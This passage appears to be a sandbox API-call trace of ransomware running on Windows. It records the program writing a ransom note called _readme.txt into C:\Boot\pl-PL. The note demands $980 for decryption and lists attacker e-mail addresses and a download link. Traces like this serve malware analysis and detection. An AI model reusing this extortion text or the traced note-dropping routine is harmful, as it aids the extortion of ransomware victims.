lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.847] PathFindFileNameW (pszPath="C:\\Boot\\pl-PL\\") returned="pl-PL\\" [0142.847] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0142.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.848] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0142.848] PathFindFileNameW (pszPath="") returned="" [0142.848] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0142.848] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0142.848] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3221ae8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0142.848] FreeLibrary (hLibModule=0x759d0000) returned 1 [0142.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.848] PathAppendW (in: pszPath="C:\\Boot\\pl-PL\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pl-PL\\_readme.txt") returned 1 [0142.848] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.848] PathFileExistsW (pszPath="C:\\Boot\\pl-PL\\_readme.txt") returned 0 [0142.849] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x9ad6f98 [0142.849] lstrcpyW (in: lpString1=0x9ad6f98, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d" [0142.849] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d", lpString2="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR" [0142.849] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9ab03c8 [0142.849] CreateFileW (lpFileName="C:\\Boot\\pl-PL\\_readme.txt" (normalized: "c:\\boot\\pl-pl\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6f0 [0142.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8c0) returned 0x3221ae8 [0142.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x85b) returned 0x325d510 [0142.850] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR", cchWideChar=-1, lpMultiByteStr=0x325d510, cbMultiByte=2139, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR", lpUsedDefaultChar=0x0) returned 1116 [0142.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x321dfc8 [0142.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.850] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR") returned 1115 [0142.850] WriteFile (in: hFile=0x6f0, lpBuffer=0x321dfc8*, nNumberOfBytesToWrite=0x45b, lpNumberOfBytesWritten=0x9dbfb64, lpOverlapped=0x0 | out: lpBuffer=0x321dfc8*, lpNumberOfBytesWritten=0x9dbfb64*=0x45b, lpOverlapped=0x0) returned 1 [0142.851] CloseHandle (hObject=0x6f0) returned 1 [0142.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321dfc8 | out: hHeap=0x620000) returned 1 [0142.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ab03c8 | out: hHeap=0x620000) returned 1 [0142.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ad6f98 | out: hHeap=0x620000) returned 1 [0142.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.851] FindFirstFileW (in: lpFileName="C:\\Boot\\pl-PL\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc8be5670, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8be5670, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3275b30 [0142.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.851] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc8be5670, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8be5670, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0142.851] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0142.851] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8be5670, ftCreationTime.dwHighDateTime=0x1d62438, ftLastAccessTime.dwLowDateTime=0xc8be5670, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8be5670, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x45b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0142.852] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8be5670, ftCreationTime.dwHighDateTime=0x1d62438, ftLastAccessTime.dwLowDateTime=0xc8be5670, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8be5670, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x45b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0142.852] FindClose (in: hFindFile=0x3275b30 | out: hFindFile=0x3275b30) returned 1 [0142.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1730 | out: hHeap=0x620000) returned 1 [0142.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1730 [0142.852] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0142.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x325d510 [0142.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.854] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.854] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.854] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.854] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.854] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.854] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.854] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.854] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.854] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.854] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.854] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.854] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.854] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.854] 